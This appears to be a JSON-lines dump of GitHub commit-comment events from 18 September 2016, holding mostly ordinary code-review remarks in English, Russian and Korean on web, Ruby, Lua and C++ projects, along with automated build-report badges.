{"id":"4580010561","type":"CommitCommentEvent","actor":{"login":"satoon101"},"repo":{"name":"Source-Python-Dev-Team/Source.Python"},"payload":{"comment":{"id":19070869,"position":null,"line":null,"path":null,"commit_id":"c87e739fd7754032dd10c7175b8ae51a03ffc9f2","created_at":"2016-09-18T14:26:55Z","updated_at":"2016-09-18T14:26:55Z","body":"Yes, I have planned on doing that, but just have not as of yet.  I already have made that int/float change locally last night while doing some work on GunGame.  I also (locally) changed the 'time' value for the DialogMsg classes to being a float, as I don't think that is restricted to being an integer, either."}},"created_at":"2016-09-18T14:26:55Z"}
{"id":"4580010583","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"AlG-off/epam_final-task"},"payload":{"comment":{"id":19070871,"position":2,"line":2,"path":"js/services/restRequest.js","commit_id":"c297ec279fd6ca96e060316ce1e248c5158eb6e1","created_at":"2016-09-18T14:26:56Z","updated_at":"2016-09-18T14:26:56Z","body":"Не нравится название метода `getData` на все действия, включая удаление, добавление и т.д."}},"created_at":"2016-09-18T14:26:56Z"}
{"id":"4580012446","type":"CommitCommentEvent","actor":{"login":"SuperSuperYC"},"repo":{"name":"SuperSuperYC/DataStructure"},"payload":{"comment":{"id":19070880,"position":null,"line":null,"path":null,"commit_id":"73c90ed7310420b62a65fce604006df99da94c5e","created_at":"2016-09-18T14:28:12Z","updated_at":"2016-09-18T14:28:12Z","body":"111"}},"created_at":"2016-09-18T14:28:12Z"}
{"id":"4580012971","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19070882,"position":190,"line":134,"path":"catalog.html","commit_id":"eea82044d9cd8642d3741c16336189d25f49a911","created_at":"2016-09-18T14:28:33Z","updated_at":"2016-09-18T14:28:33Z","body":"Перенесите на новые строки вложенные элементы, и лучше все-таки первые буквы сделать заглавными."}},"created_at":"2016-09-18T14:28:33Z"}
{"id":"4580013437","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19070884,"position":156,"line":100,"path":"catalog.html","commit_id":"eea82044d9cd8642d3741c16336189d25f49a911","created_at":"2016-09-18T14:28:54Z","updated_at":"2016-09-18T14:28:54Z","body":"Все-таки здесь нужна обертка чтобы добавить clearfix, если бы не было элемента h2, тогда да, обертка не нужна бы была, вы бы добавили clearfix к container, а здесь так не получится."}},"created_at":"2016-09-18T14:28:54Z"}
{"id":"4580015404","type":"CommitCommentEvent","actor":{"login":"rjpiva"},"repo":{"name":"rjpiva/Blockchain_To-the-point"},"payload":{"comment":{"id":19070890,"position":null,"line":null,"path":null,"commit_id":"62a60e35318485205bd9c82bcdf0166586da873a","created_at":"2016-09-18T14:30:05Z","updated_at":"2016-09-18T14:30:05Z","body":"![temp_high](https://cloud.githubusercontent.com/assets/15706294/18616493/1b56bc74-7d93-11e6-804f-3ee4f467fcba.jpg)\r\n"}},"created_at":"2016-09-18T14:30:05Z"}
{"id":"4580016451","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19070895,"position":231,"line":163,"path":"catalog.html","commit_id":"eea82044d9cd8642d3741c16336189d25f49a911","created_at":"2016-09-18T14:30:38Z","updated_at":"2016-09-18T14:30:38Z","body":"Ошибка в слове Перфоратор"}},"created_at":"2016-09-18T14:30:38Z"}
{"id":"4580016696","type":"CommitCommentEvent","actor":{"login":"destdev"},"repo":{"name":"Fluorohydride/ygopro-pre-script"},"payload":{"comment":{"id":19070896,"position":null,"line":null,"path":null,"commit_id":"7ad24c9ead10fe4690f304d5eca0c4ec83403c17","created_at":"2016-09-18T14:30:48Z","updated_at":"2016-09-18T14:30:48Z","body":"if you exclude the whole mat2 I think you also exclude ritual djinns from this and shuffle those back instead of banishing, you might need to seperate those from mat2 as well\r\nsorry, would have uploaded mine an hour ago if I wouldn't stumble across my brainfarts all the time^^"}},"created_at":"2016-09-18T14:30:48Z"}
{"id":"4580016713","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19070897,"position":null,"line":null,"path":null,"commit_id":"519b41e47eee262539ebe5f64019362ef018eeb1","created_at":"2016-09-18T14:30:50Z","updated_at":"2016-09-18T14:30:50Z","body":"Also see [Issue 227, SunCC 12.2-12.5 and failed compile for gcm.cpp](http://github.com/weidai11/cryptopp/issues/227)."}},"created_at":"2016-09-18T14:30:50Z"}
{"id":"4580017724","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19070901,"position":null,"line":null,"path":null,"commit_id":"4fb75a8f4d57ddfb5c1c1e7d00e6eb1aeb671901","created_at":"2016-09-18T14:31:28Z","updated_at":"2016-09-18T14:31:28Z","body":"Also see [Issue 227, SunCC 12.2-12.5 and failed compile for gcm.cpp](http://github.com/weidai11/cryptopp/issues/227)."}},"created_at":"2016-09-18T14:31:28Z"}
{"id":"4580017961","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19070902,"position":null,"line":null,"path":null,"commit_id":"8f330545457d678caa59c3d4d8f7da6fb1bddd4f","created_at":"2016-09-18T14:31:37Z","updated_at":"2016-09-18T14:31:37Z","body":"Also see [Issue 227, SunCC 12.2-12.5 and failed compile for gcm.cpp](http://github.com/weidai11/cryptopp/issues/227)."}},"created_at":"2016-09-18T14:31:37Z"}
{"id":"4580018135","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"AlG-off/epam_final-task"},"payload":{"comment":{"id":19070903,"position":1,"line":1,"path":"js/directives/user-block/user-block.html","commit_id":"ba18155cca903ab1cdf0ac8f90f5d62682edb3ee","created_at":"2016-09-18T14:31:44Z","updated_at":"2016-09-18T14:31:44Z","body":"А где эта директива используется? В index.html такая же верстка, как и здесь."}},"created_at":"2016-09-18T14:31:44Z"}
{"id":"4580018790","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"AlG-off/epam_final-task"},"payload":{"comment":{"id":19070905,"position":4,"line":3,"path":"pages/edit.html","commit_id":"ba18155cca903ab1cdf0ac8f90f5d62682edb3ee","created_at":"2016-09-18T14:32:11Z","updated_at":"2016-09-18T14:32:11Z","body":"`===`"}},"created_at":"2016-09-18T14:32:11Z"}
{"id":"4580018962","type":"CommitCommentEvent","actor":{"login":"fee1good"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":19070906,"position":95,"line":95,"path":"lesson_4/railways_core.rb","commit_id":"02eb7248ac0c4701eb48e1bb18ca1a1d782de490","created_at":"2016-09-18T14:32:17Z","updated_at":"2016-09-18T14:32:17Z","body":"Почему-то не отрабатывает метод, выдает ошибку:\r\n\r\n```\r\n/home/victor/ROR/thinknetica_ror_beginer/lesson_4/train.rb:71:in `delete_wagon': undefined method `-' for \"20\":String (NoMethodError)\r\nDid you mean?  -@\r\n\tfrom /home/victor/ROR/thinknetica_ror_beginer/lesson_4/railways_core.rb:94:in `remove_wagon'\r\n\tfrom /home/victor/ROR/thinknetica_ror_beginer/lesson_4/railways_core.rb:40:in `block in take_menu_item'\r\n\tfrom /home/victor/ROR/thinknetica_ror_beginer/lesson_4/railways_core.rb:23:in `loop'\r\n\tfrom /home/victor/ROR/thinknetica_ror_beginer/lesson_4/railways_core.rb:23:in `take_menu_item'\r\n\tfrom railways_exe.rb:5:in `<main>'\r\n```\r\n\r\nПонимаю, что косяк где-то в:\r\n\r\n```\r\ndef delete_wagon\r\n\tif @wagons_count <= 0\r\n\tabort\r\n\tend\r\n\t@wagons_count -= 1\r\nend\t\r\n```\r\n\r\nТолько сходу не могу понять где."}},"created_at":"2016-09-18T14:32:17Z"}
{"id":"4580019221","type":"CommitCommentEvent","actor":{"login":"technomancy"},"repo":{"name":"RamiLego4Game/LIKO-12"},"payload":{"comment":{"id":19070909,"position":null,"line":null,"path":null,"commit_id":"ac9b98c4db7b9e999b24cd3d3d2b3e58fc545eda","created_at":"2016-09-18T14:32:28Z","updated_at":"2016-09-18T14:32:28Z","body":"This looks great so far. Is there a reason you named it `_startup` instead of `_init` like pico-8 though?\r\n\r\nAlso, is it an explicit design choice not to have a separate `_draw` function? Are games intended to draw from `_update`?\r\n\r\nPerhaps there should be a section for \"intentional differences from pico-8\" so people can tell which things are different on purpose vs different because we haven't gotten around to it yet."}},"created_at":"2016-09-18T14:32:28Z"}
{"id":"4580020724","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"AlG-off/epam_final-task"},"payload":{"comment":{"id":19070914,"position":25,"line":25,"path":"js/app.js","commit_id":"c3cfd44a0c00c096d5488a88394524c7af186160","created_at":"2016-09-18T14:33:26Z","updated_at":"2016-09-18T14:33:26Z","body":"Несколько необычно, добавлять параметр, который говорит, что логиниться не нужно. Обычно наоборот)"}},"created_at":"2016-09-18T14:33:26Z"}
{"id":"4580021511","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19070917,"position":null,"line":null,"path":null,"commit_id":"eea82044d9cd8642d3741c16336189d25f49a911","created_at":"2016-09-18T14:34:01Z","updated_at":"2016-09-18T14:34:01Z","body":"Проверьте в validator.w3.org главная страницу, там есть ошибки"}},"created_at":"2016-09-18T14:34:01Z"}
{"id":"4580022693","type":"CommitCommentEvent","actor":{"login":"JBCDroid2"},"repo":{"name":"CypherOS/device_motorola_msm8916-common"},"payload":{"comment":{"id":19070920,"position":null,"line":null,"path":null,"commit_id":"bd80cfb7773dd239750406bec19e4b272fc0eb44","created_at":"2016-09-18T14:34:46Z","updated_at":"2016-09-18T14:34:46Z","body":"you are getting errors with lib_driver_cmd_qcwcn intermediates?"}},"created_at":"2016-09-18T14:34:46Z"}
{"id":"4580022803","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"AlG-off/epam_final-task"},"payload":{"comment":{"id":19070921,"position":60,"line":60,"path":"js/app.js","commit_id":"c3cfd44a0c00c096d5488a88394524c7af186160","created_at":"2016-09-18T14:34:51Z","updated_at":"2016-09-18T14:34:51Z","body":"Лучше из сервиса вернуть результат проверки и здесь редиректнуть на логин, если пользователь незалогиненный. В сервис не нужно делать редирект."}},"created_at":"2016-09-18T14:34:51Z"}
{"id":"4580025676","type":"CommitCommentEvent","actor":{"login":"adbro86"},"repo":{"name":"adbro86/Hello-World"},"payload":{"comment":{"id":19070927,"position":null,"line":null,"path":null,"commit_id":"c3c65bdabf6a9dc3c3d73386028913b305f5697d","created_at":"2016-09-18T14:36:37Z","updated_at":"2016-09-18T14:36:37Z","body":"On GitHub, saved changes are called commits. Each commit has an associated commit message, which is a description explaining why a particular change was made. Commit messages capture the history of your changes, so other contributors can understand what you’ve done and why."}},"created_at":"2016-09-18T14:36:37Z"}
{"id":"4580026597","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"AlG-off/epam_final-task"},"payload":{"comment":{"id":19070930,"position":42,"line":42,"path":"js/controllers/HomeCtrl.js","commit_id":"c3cfd44a0c00c096d5488a88394524c7af186160","created_at":"2016-09-18T14:37:12Z","updated_at":"2016-09-18T14:37:12Z","body":"```\r\n        function delCourse(id, index){\r\n            if (confirm(\"Вы действидельно хотите безвозвратно удалить эту запись?\")) {\r\n                dataService.delCourse(id);\r\n                $scope.coursesList.splice(index,1);\r\n            }\r\n         }\r\n```"}},"created_at":"2016-09-18T14:37:12Z"}
{"id":"4580027320","type":"CommitCommentEvent","actor":{"login":"JakeChampion"},"repo":{"name":"falsandtru/Array.from"},"payload":{"comment":{"id":19070931,"position":5,"line":81,"path":"implementation.js","commit_id":"6a8d818223e0911d92a99d6b378224f39f2bb1b8","created_at":"2016-09-18T14:37:40Z","updated_at":"2016-09-18T14:37:40Z","body":"`[0]` should probably be a map or set object to truly test that the browser can iterate over those types of objects using `for...of`"}},"created_at":"2016-09-18T14:37:40Z"}
{"id":"4580028406","type":"CommitCommentEvent","actor":{"login":"mercury233"},"repo":{"name":"Fluorohydride/ygopro-pre-script"},"payload":{"comment":{"id":19070933,"position":null,"line":null,"path":null,"commit_id":"7ad24c9ead10fe4690f304d5eca0c4ec83403c17","created_at":"2016-09-18T14:38:17Z","updated_at":"2016-09-18T14:38:17Z","body":"https://github.com/Fluorohydride/ygopro-pre-script/commit/5652a9f5c9bc1041263f2107bf8d178849eaec69\r\nSorry, i forgot that."}},"created_at":"2016-09-18T14:38:17Z"}
{"id":"4580028408","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19070934,"position":null,"line":null,"path":null,"commit_id":"f8348676296f2e1edc4ba25eced49846d430d05f","created_at":"2016-09-18T14:38:18Z","updated_at":"2016-09-18T14:38:18Z","body":"Build report #160835694 for sha f8348676296f2e1edc4ba25eced49846d430d05f:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%280/0%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-0.00%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-0%20error%28s%29-brightgreen.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-0%20/%200%20%280.00%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-0.00%20%25-yellow.svg)](#)\n"}},"created_at":"2016-09-18T14:38:18Z"}
{"id":"4580028420","type":"CommitCommentEvent","actor":{"login":"FredyC"},"repo":{"name":"stampit-org/stampit"},"payload":{"comment":{"id":19070935,"position":39,"line":353,"path":"docs/API.md","commit_id":"7c9b29d320b73e8a8e6a6a9979de7c60e41d67a8","created_at":"2016-09-18T14:38:18Z","updated_at":"2016-09-18T14:38:18Z","body":"Still no mention that you need to access `compose.deepConfiguration` instead of `compose.configuration` ?"}},"created_at":"2016-09-18T14:38:18Z"}
{"id":"4580029203","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19070936,"position":48,"line":45,"path":"index.html","commit_id":"eea82044d9cd8642d3741c16336189d25f49a911","created_at":"2016-09-18T14:38:50Z","updated_at":"2016-09-18T14:38:50Z","body":"Здесь не нужен список"}},"created_at":"2016-09-18T14:38:50Z"}
{"id":"4580029643","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19070937,"position":null,"line":null,"path":null,"commit_id":"234fa2d1c1b5ab543fe0c3bffec6b97891a5f545","created_at":"2016-09-18T14:39:06Z","updated_at":"2016-09-18T14:39:06Z","body":"Build report #160835787 for sha 234fa2d1c1b5ab543fe0c3bffec6b97891a5f545:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%280/0%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-0.00%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-0%20error%28s%29-brightgreen.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-0%20/%200%20%280.00%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-0.00%20%25-yellow.svg)](#)\n"}},"created_at":"2016-09-18T14:39:06Z"}
{"id":"4580030245","type":"CommitCommentEvent","actor":{"login":"koresar"},"repo":{"name":"stampit-org/stampit"},"payload":{"comment":{"id":19070938,"position":39,"line":353,"path":"docs/API.md","commit_id":"7c9b29d320b73e8a8e6a6a9979de7c60e41d67a8","created_at":"2016-09-18T14:39:31Z","updated_at":"2016-09-18T14:39:31Z","body":"ok"}},"created_at":"2016-09-18T14:39:31Z"}
{"id":"4580031182","type":"CommitCommentEvent","actor":{"login":"fhieber"},"repo":{"name":"fhieber/incubator-joshua"},"payload":{"comment":{"id":19070942,"position":null,"line":null,"path":null,"commit_id":"008f2f4ad26cf9745b74f7b9933838a616cc177f","created_at":"2016-09-18T14:40:08Z","updated_at":"2016-09-18T14:40:08Z","body":"The default value that was used for the last ~12 months was 5000, but I guess 10k should also be fine"}},"created_at":"2016-09-18T14:40:08Z"}
{"id":"4580031591","type":"CommitCommentEvent","actor":{"login":"marcoarthur"},"repo":{"name":"moose/Moose"},"payload":{"comment":{"id":19070943,"position":7,"line":452,"path":"lib/Moose.pm","commit_id":"49c318df621c749e9018200d08643ceefcb91387","created_at":"2016-09-18T14:40:22Z","updated_at":"2016-09-18T14:40:22Z","body":"A suggestion that this conflict will show up during module compile time (not a run time error)."}},"created_at":"2016-09-18T14:40:22Z"}
{"id":"4580031670","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19070944,"position":null,"line":null,"path":null,"commit_id":"a4b11538a8804c1cd0413237045151d22b6f298f","created_at":"2016-09-18T14:40:26Z","updated_at":"2016-09-18T14:40:26Z","body":"Initial commit"}},"created_at":"2016-09-18T14:40:26Z"}
{"id":"4580032532","type":"CommitCommentEvent","actor":{"login":"abhisekp"},"repo":{"name":"stampit-org/stampit"},"payload":{"comment":{"id":19070945,"position":39,"line":353,"path":"docs/API.md","commit_id":"7c9b29d320b73e8a8e6a6a9979de7c60e41d67a8","created_at":"2016-09-18T14:41:01Z","updated_at":"2016-09-18T14:41:01Z","body":"This one is tricky :100: "}},"created_at":"2016-09-18T14:41:01Z"}
{"id":"4580033714","type":"CommitCommentEvent","actor":{"login":"SangWook-Han"},"repo":{"name":"SangWook-Han/iphoneappmaker"},"payload":{"comment":{"id":19070948,"position":null,"line":null,"path":null,"commit_id":"1ccb63ed6ef6acf23a3d39e54777925cc6017d3d","created_at":"2016-09-18T14:41:43Z","updated_at":"2016-09-18T14:41:43Z","body":"good"}},"created_at":"2016-09-18T14:41:43Z"}
{"id":"4580034743","type":"CommitCommentEvent","actor":{"login":"technomancy"},"repo":{"name":"RamiLego4Game/LIKO-12"},"payload":{"comment":{"id":19070949,"position":170,"line":170,"path":"class.lua","commit_id":"d10906b1c44be4467a053659b5b51767b0901fb2","created_at":"2016-09-18T14:42:26Z","updated_at":"2016-09-18T14:42:26Z","body":"This file should probably be moved under the `libraries` directory, right?"}},"created_at":"2016-09-18T14:42:26Z"}
{"id":"4580035338","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19070952,"position":null,"line":null,"path":null,"commit_id":"cedf04023c64f437da977e791b6384fbb39a7857","created_at":"2016-09-18T14:42:51Z","updated_at":"2016-09-18T14:42:51Z","body":"Sep 18, 2016\r\n\r\nInitial commit"}},"created_at":"2016-09-18T14:42:51Z"}
{"id":"4580035930","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"AlG-off/epam_final-task"},"payload":{"comment":{"id":19070955,"position":6,"line":6,"path":"js/controllers/MainCtrl.js","commit_id":"c3cfd44a0c00c096d5488a88394524c7af186160","created_at":"2016-09-18T14:43:14Z","updated_at":"2016-09-18T14:43:14Z","body":"Хорошо бы сделать директиву для пользователя и  `AuthService.signout` вызывать в ней, а не в контроллере."}},"created_at":"2016-09-18T14:43:14Z"}
{"id":"4580036035","type":"CommitCommentEvent","actor":{"login":"apanx"},"repo":{"name":"apanx/Derpibooru-dl"},"payload":{"comment":{"id":19070956,"position":null,"line":null,"path":null,"commit_id":"40a1ed0582a8dd9dd6efb9f7e693090e36ddd468","created_at":"2016-09-18T14:43:19Z","updated_at":"2016-09-18T14:43:19Z","body":"Integrate changes by oblivion2k to enable download of tags containing spaces"}},"created_at":"2016-09-18T14:43:19Z"}
{"id":"4580036044","type":"CommitCommentEvent","actor":{"login":"tanhanliang"},"repo":{"name":"CUMSA/members"},"payload":{"comment":{"id":19070957,"position":null,"line":null,"path":null,"commit_id":"19ecff79eb272c295361c951fd8f4e92545856c4","created_at":"2016-09-18T14:43:19Z","updated_at":"2016-09-18T14:43:19Z","body":"Console.log returns an object so I guess that was the problem. I'll try again!"}},"created_at":"2016-09-18T14:43:19Z"}
{"id":"4580037821","type":"CommitCommentEvent","actor":{"login":"flamingice"},"repo":{"name":"ahartimvu/vzdump-plugin-b2"},"payload":{"comment":{"id":19070959,"position":null,"line":null,"path":null,"commit_id":"dd9c60f9e9ae522e564c87a4ccfae73a8e968806","created_at":"2016-09-18T14:44:37Z","updated_at":"2016-09-18T14:44:37Z","body":"this helped, thanks!"}},"created_at":"2016-09-18T14:44:37Z"}
{"id":"4580037857","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"AlG-off/epam_final-task"},"payload":{"comment":{"id":19070960,"position":21,"line":21,"path":"index.html","commit_id":"c3cfd44a0c00c096d5488a88394524c7af186160","created_at":"2016-09-18T14:44:39Z","updated_at":"2016-09-18T14:44:39Z","body":"Для блока с пользователем лучше сделать директиву"}},"created_at":"2016-09-18T14:44:39Z"}
{"id":"4580039354","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"AlG-off/epam_final-task"},"payload":{"comment":{"id":19070961,"position":11,"line":11,"path":"js/controllers/EditCtrl.js","commit_id":"c3cfd44a0c00c096d5488a88394524c7af186160","created_at":"2016-09-18T14:45:38Z","updated_at":"2016-09-18T14:45:38Z","body":"Почему не сразу ` dataService.saveCourse($scope.tempStore.selectedCourse);`?"}},"created_at":"2016-09-18T14:45:38Z"}
{"id":"4580039521","type":"CommitCommentEvent","actor":{"login":"fhieber"},"repo":{"name":"fhieber/incubator-joshua"},"payload":{"comment":{"id":19070962,"position":null,"line":null,"path":null,"commit_id":"8f47187e4a5d8d4ea5940165b88eec1d7615610b","created_at":"2016-09-18T14:45:46Z","updated_at":"2016-09-18T14:45:46Z","body":"Hi Matt, regarding the silent failure of loading missing configs: You can make this explicit by using the proper options. I have done this here already, maybe we can use a TestUtil function that automatically sets ConfigParseOptions accordingly: \r\nhttps://github.com/fhieber/incubator-joshua/blob/7_confsystem/joshua-core/src/main/java/org/apache/joshua/decoder/Decoder.java#L148"}},"created_at":"2016-09-18T14:45:46Z"}
{"id":"4580043156","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"AlG-off/epam_final-task"},"payload":{"comment":{"id":19070964,"position":61,"line":61,"path":"pages/edit.html","commit_id":"c3cfd44a0c00c096d5488a88394524c7af186160","created_at":"2016-09-18T14:48:06Z","updated_at":"2016-09-18T14:48:06Z","body":"Кнопки лучше сделать отдельным классом, вроде `btn btn--dashboard btn--active`, т.к. велика вероятность, что такая кнопка может быть нужна в другом месте."}},"created_at":"2016-09-18T14:48:06Z"}
{"id":"4580043442","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"AlG-off/epam_final-task"},"payload":{"comment":{"id":19070965,"position":61,"line":61,"path":"pages/edit.html","commit_id":"c3cfd44a0c00c096d5488a88394524c7af186160","created_at":"2016-09-18T14:48:16Z","updated_at":"2016-09-18T14:48:16Z","body":"Без привязки к дашборду"}},"created_at":"2016-09-18T14:48:16Z"}
{"id":"4580044025","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"AlG-off/epam_final-task"},"payload":{"comment":{"id":19070967,"position":66,"line":66,"path":"pages/edit.html","commit_id":"c3cfd44a0c00c096d5488a88394524c7af186160","created_at":"2016-09-18T14:48:41Z","updated_at":"2016-09-18T14:48:41Z","body":"Здесь и в других местах `===`"}},"created_at":"2016-09-18T14:48:41Z"}
{"id":"4580045416","type":"CommitCommentEvent","actor":{"login":"gyrog"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19070970,"position":null,"line":null,"path":null,"commit_id":"5e631b1aa92812b784fbf479768b3f027e187300","created_at":"2016-09-18T14:49:41Z","updated_at":"2016-09-18T14:49:41Z","body":"Sorry, but I disagree with adding the size of the sfs's to the size of the tmpfs.\r\nIt doesn't make it \"proper\" it only makes it \"the same\".\r\nIt hides a reality that was hidden by the old init, but exposed by the new init.\r\nIt's an uncessary complication. If a user wants a bigger tmpfs, they should increase the size of their swap, doing this increases their insurance rather than decreasing it.\r\nHaving said my piece, I will let it be.\r\n"}},"created_at":"2016-09-18T14:49:41Z"}
{"id":"4580045494","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"AlG-off/epam_final-task"},"payload":{"comment":{"id":19070971,"position":64,"line":64,"path":"pages/home.html","commit_id":"c3cfd44a0c00c096d5488a88394524c7af186160","created_at":"2016-09-18T14:49:44Z","updated_at":"2016-09-18T14:49:44Z","body":"Edit это переход на другую страницу, поэтому тут логичнее ссылка, а не кнопка"}},"created_at":"2016-09-18T14:49:44Z"}
{"id":"4580045573","type":"CommitCommentEvent","actor":{"login":"mcccs"},"repo":{"name":"ThisTestUser/Docs"},"payload":{"comment":{"id":19070972,"position":null,"line":null,"path":null,"commit_id":"ee739e1721641f4655aafd3d0cddd9b7defd69f0","created_at":"2016-09-18T14:49:46Z","updated_at":"2016-09-18T14:49:46Z","body":"@ThisTestUser I heard that newest Tomato can bypass Gwen?"}},"created_at":"2016-09-18T14:49:46Z"}
{"id":"4580046352","type":"CommitCommentEvent","actor":{"login":"destdev"},"repo":{"name":"Fluorohydride/ygopro-pre-script"},"payload":{"comment":{"id":19070975,"position":null,"line":null,"path":null,"commit_id":"c63f47b40655ada983db5c66ff2d1caf9f21b7f6","created_at":"2016-09-18T14:50:15Z","updated_at":"2016-09-18T14:50:15Z","body":"is e3 once?\r\nin the english translation there is no restriction to the amount of uses... translation error I presume?"}},"created_at":"2016-09-18T14:50:15Z"}
{"id":"4580047104","type":"CommitCommentEvent","actor":{"login":"jonathanmeguira"},"repo":{"name":"jonathanmeguira/current-"},"payload":{"comment":{"id":19070978,"position":null,"line":null,"path":null,"commit_id":"32bca5aa229ae7e547e30b1b771621d01f20e937","created_at":"2016-09-18T14:50:44Z","updated_at":"2016-09-18T14:50:44Z","body":"Might want to check though tomorrow with global post to db.json \nAlso perform post to db.json for new channel wizzard\n\nMove the table inside policy definition \nSet ui-sref-active on policy inner nav"}},"created_at":"2016-09-18T14:50:44Z"}
{"id":"4580047401","type":"CommitCommentEvent","actor":{"login":"nschneid"},"repo":{"name":"UniversalDependencies/docs"},"payload":{"comment":{"id":19070979,"position":57,"line":143,"path":"_2016-09-05--06-prague/copula.md","commit_id":"d06801d62f55aedec8ed38766894cf93ca650087","created_at":"2016-09-18T14:50:57Z","updated_at":"2016-09-18T14:50:57Z","body":"Re: \"The problem is that she is not happy\"—would it be desirable to distinguish the local copula directly supporting \"happy\" from the matrix copula?\r\n\r\n    nsubj:cop(happy, she)\r\n    nsubj:cop:matrix(happy, problem)\r\n    cop(happy, is-6)\r\n    cop:matrix(happy, is-3)\r\n\r\nI.e., using `:matrix` whenever the predicate is linked to something in an outer clause. This would compensate somewhat for the flattening that results from treating content words as heads. But it may be more trouble than it's worth."}},"created_at":"2016-09-18T14:50:57Z"}
{"id":"4580048807","type":"CommitCommentEvent","actor":{"login":"wvicioso"},"repo":{"name":"wvicioso/NanCatVicious"},"payload":{"comment":{"id":19070982,"position":41,"line":107,"path":"sudoku.rb","commit_id":"756733193ae17b859b892c13cb3f4d9ac0c87188","created_at":"2016-09-18T14:51:54Z","updated_at":"2016-09-18T14:51:54Z","body":"Good idea here but sample can potentially cause our program to guess the same letter at the same board position more than once."}},"created_at":"2016-09-18T14:51:54Z"}
{"id":"4580049709","type":"CommitCommentEvent","actor":{"login":"mercury233"},"repo":{"name":"Fluorohydride/ygopro-pre-script"},"payload":{"comment":{"id":19070983,"position":null,"line":null,"path":null,"commit_id":"c63f47b40655ada983db5c66ff2d1caf9f21b7f6","created_at":"2016-09-18T14:52:27Z","updated_at":"2016-09-18T14:52:27Z","body":"No it is my mistake.."}},"created_at":"2016-09-18T14:52:27Z"}
{"id":"4580051608","type":"CommitCommentEvent","actor":{"login":"tarsius"},"repo":{"name":"foretagsplatsen/emacs-js"},"payload":{"comment":{"id":19070985,"position":null,"line":null,"path":null,"commit_id":"69b041f240dc1b6239f51159ee4bd97e596ee7d5","created_at":"2016-09-18T14:53:47Z","updated_at":"2016-09-18T14:53:47Z","body":"Now that `gulp-task-runner` is available from its own repository, it should be removed from here."}},"created_at":"2016-09-18T14:53:47Z"}
{"id":"4580053041","type":"CommitCommentEvent","actor":{"login":"RadDesigns"},"repo":{"name":"RadDesigns/hello-world"},"payload":{"comment":{"id":19070988,"position":null,"line":null,"path":null,"commit_id":"7f7becefb2117f8bc1d82507d1cd0c0368514699","created_at":"2016-09-18T14:54:42Z","updated_at":"2016-09-18T14:54:42Z","body":"Looks Good\r\n"}},"created_at":"2016-09-18T14:54:42Z"}
{"id":"4580053324","type":"CommitCommentEvent","actor":{"login":"ckwnsqja"},"repo":{"name":"Communitips/test"},"payload":{"comment":{"id":19070989,"position":null,"line":null,"path":null,"commit_id":"4ccd5141a4f46cb866c0937af73f1471323e4313","created_at":"2016-09-18T14:54:55Z","updated_at":"2016-09-18T14:54:55Z","body":"파일 설명 여기다 적어줘"}},"created_at":"2016-09-18T14:54:55Z"}
